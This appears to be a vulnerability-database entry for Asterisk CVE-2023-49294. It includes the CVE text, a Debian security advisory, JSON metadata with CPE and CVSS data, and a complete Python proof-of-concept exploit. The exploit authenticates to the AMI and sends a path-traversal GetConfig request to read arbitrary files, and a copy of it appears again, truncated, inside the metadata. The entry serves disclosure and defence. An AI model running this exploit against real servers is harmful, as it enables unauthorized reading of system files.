Search

Find a vulnerability

Search criteria Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.

    235 vulnerabilities found for asterisk by digium

    VAR-202312-2340

    Vulnerability from variot - Updated: 2024-03-30 22:40

    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512


    Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq


    Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

    Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

    CVE-2023-37457

    The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
    the available buffer space for storing the new value of a header. By doing
    so this can overwrite memory or cause a crash. This is not externally
    exploitable, unless dialplan is explicitly written to update a header based
    on data from an outside source. If the 'update' functionality is not used
    the vulnerability does not occur.
    

    CVE-2023-38703

    PJSIP is a free and open source multimedia communication library written in
    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
    higher level media transport which is stacked upon a lower level media
    transport such as UDP and ICE. Currently a higher level transport is not
    synchronized with its lower level transport that may introduce a
    use-after-free issue. This vulnerability affects applications that have
    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
    transport other than UDP. This vulnerability’s impact may range from
    unexpected application termination to control flow hijack/memory
    corruption.
    

    CVE-2023-49786

    Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

    For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

    We recommend that you upgrade your asterisk packages.

    For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

    iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE----- . # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)

    Date: 2023-03-26

    Exploit Author: Sean Pesce

    Vendor Homepage: https://asterisk.org/

    Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/

    Version: 18.20.0

    Tested on: Debian Linux

    CVE: CVE-2023-49294

    !/usr/bin/env python3

    Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that

    facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of

    file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar

    to the common INI configuration format.

    References:

    https://nvd.nist.gov/vuln/detail/CVE-2023-49294

    https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f

    https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/

    import argparse import getpass import socket import sys

    CVE_ID = 'CVE-2023-49294'

    DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB

    def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding)

    def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp

    if name == 'main': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args()

    # Validate command-line arguments
    assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
    args.host = socket.gethostbyname(args.host)
    if args.password is None:
        args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')
    
    print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
    print(f'[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}', file=sys.stderr)
    
    # Connect to the Asterisk AMI server
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.connect((args.host, args.port))
    
    # Read server banner
    banner = sock.recv(DEFAULT_TCP_READ_SZ)
    print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)
    
    # Authenticate to the Asterisk AMI server
    login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
    login_resp = tcp_send_rcv(sock, login_msg)
    while b'Authentication' not in login_resp:
        login_resp = tcp_send_rcv(sock, b'')
    if b'Authentication accepted' not in login_resp:
        print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
        sys.exit(1)
    #print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
    print(f'[INFO] Login success', file=sys.stderr)
    
    # Obtain file data via path traversal
    traversal = '../../../../../../../../'
    cfg_msg = ami_msg('GetConfig', {
        'ActionID': args.action_id,
        'Filename': f'{traversal}{args.file}',
        #'Category': 'default',
        #'Filter': 'name_regex=value_regex,',
    })
    resp = tcp_send_rcv(sock, cfg_msg)
    while b'Response' not in resp:
        resp = tcp_send_rcv(sock, b'')
    
    print(f'', file=sys.stderr)
    print(f'{resp.decode("utf8")}')
    
    if b'Error' in resp:
        sys.exit(1)
    
    pass  # Done
    

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202312-2340",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "18.20.1"
          },
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "19.0.0"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "18.9"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "16.8.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "20.5.1"
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "digium",
            "version": "21.0.0"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "13.13.0"
          },
          {
            "model": "asterisk",
            "scope": null,
            "trust": 0.8,
            "vendor": "digium",
            "version": null
          },
          {
            "model": "certified asterisk",
            "scope": null,
            "trust": 0.8,
            "vendor": "sangoma",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "18.20.1",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "20.5.1",
                    "versionStartIncluding": "19.0.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Debian",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "176383"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2023-49294",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security-advisories@github.com",
                "availabilityImpact": "NONE",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2023-49294",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-49294",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "security-advisories@github.com",
                "id": "CVE-2023-49294",
                "trust": 1.0,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n    The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n    the available buffer space for storing the new value of a header. By doing\n    so this can overwrite memory or cause a crash. This is not externally\n    exploitable, unless dialplan is explicitly written to update a header based\n    on data from an outside source. If the \u0027update\u0027 functionality is not used\n    the vulnerability does not occur. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49786\n\n   Asterisk is susceptible to a DoS due to a race condition in the hello\n   handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n   setup. This attack can be done continuously, thus denying new DTLS-SRTP\n   encrypted calls during the attack. Abuse of this vulnerability may lead to\n   a massive Denial of Service on vulnerable Asterisk servers for calls that\n   rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n. # Exploit Title: Asterisk AMI - Partial File Content \u0026 Path Disclosure (Authenticated)\n# Date: 2023-03-26\n# Exploit Author: Sean Pesce\n# Vendor Homepage: https://asterisk.org/\n# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/\n# Version: 18.20.0\n# Tested on: Debian Linux\n# CVE: CVE-2023-49294\n\n#!/usr/bin/env python3\n#\n# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that\n# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of\n# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar\n# to the common INI configuration format. \n#\n# References:\n#   https://nvd.nist.gov/vuln/detail/CVE-2023-49294\n#   https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\n#   https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/\n\n\nimport argparse\nimport getpass\nimport socket\nimport sys\n\n\nCVE_ID = \u0027CVE-2023-49294\u0027\n\nDEFAULT_PORT = 5038\nDEFAULT_FILE = \u0027/etc/hosts\u0027\nDEFAULT_ACTION_ID = 0\nDEFAULT_TCP_READ_SZ = 1048576  # 1MB\n\n\n\ndef ami_msg(action, args, encoding=\u0027utf8\u0027):\n    assert type(action) == str, f\u0027Invalid type for AMI Action (expected string): {type(action)}\u0027\n    assert type(args) == dict, f\u0027Invalid type for AMI arguments (expected dict): {type(args)}\u0027\n    if \u0027ActionID\u0027 not in args:\n        args[\u0027ActionID\u0027] = 0\n    line_sep = \u0027\\r\\n\u0027\n    data = f\u0027Action: {action}{line_sep}\u0027\n    for a in args:\n        data += f\u0027{a}: {args[a]}{line_sep}\u0027\n    data += line_sep\n    return data.encode(encoding)\n\n\n\ndef tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):\n    assert type(data) in (bytes, bytearray, memoryview), f\u0027Invalid data type (expected bytes): {type(data)}\u0027\n    sock.sendall(data)\n    resp = b\u0027\u0027\n    while not resp.endswith(b\u0027\\r\\n\\r\\n\u0027):\n        resp += sock.recv(read_sz)\n    return resp\n\n\n\nif __name__ == \u0027__main__\u0027:\n    # Parse command-line arguments\n    argparser = argparse.ArgumentParser()\n    argparser.add_argument(\u0027host\u0027, type=str, help=\u0027The host name or IP address of the Asterisk AMI server\u0027)\n    argparser.add_argument(\u0027-p\u0027, \u0027--port\u0027, type=int, help=f\u0027Asterisk AMI TCP port (default: {DEFAULT_PORT})\u0027, default=DEFAULT_PORT)\n    argparser.add_argument(\u0027-u\u0027, \u0027--user\u0027, type=str, help=f\u0027Asterisk AMI user\u0027, required=True)\n    argparser.add_argument(\u0027-P\u0027, \u0027--password\u0027, type=str, help=f\u0027Asterisk AMI secret\u0027, default=None)\n    argparser.add_argument(\u0027-f\u0027, \u0027--file\u0027, type=str, help=f\u0027File to read (default: {DEFAULT_FILE})\u0027, default=DEFAULT_FILE)\n    argparser.add_argument(\u0027-a\u0027, \u0027--action-id\u0027, type=int, help=f\u0027Action ID (default: {DEFAULT_ACTION_ID})\u0027, default=DEFAULT_ACTION_ID)\n    if \u0027-h\u0027 in sys.argv or \u0027--help\u0027 in sys.argv:\n        print(f\u0027Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \\nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\\n\u0027, file=sys.stderr)\n        argparser.print_help()\n        sys.exit(0)\n    args = argparser.parse_args()\n\n    # Validate command-line arguments\n    assert 1 \u003c= args.port \u003c= 65535, f\u0027Invalid port number: {args.port}\u0027\n    args.host = socket.gethostbyname(args.host)\n    if args.password is None:\n        args.password = getpass.getpass(f\u0027[PROMPT] Enter the AMI password for {args.user}: \u0027)\n\n    print(f\u0027[INFO] Proof of concept exploit for {CVE_ID}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}\u0027, file=sys.stderr)\n\n    # Connect to the Asterisk AMI server\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    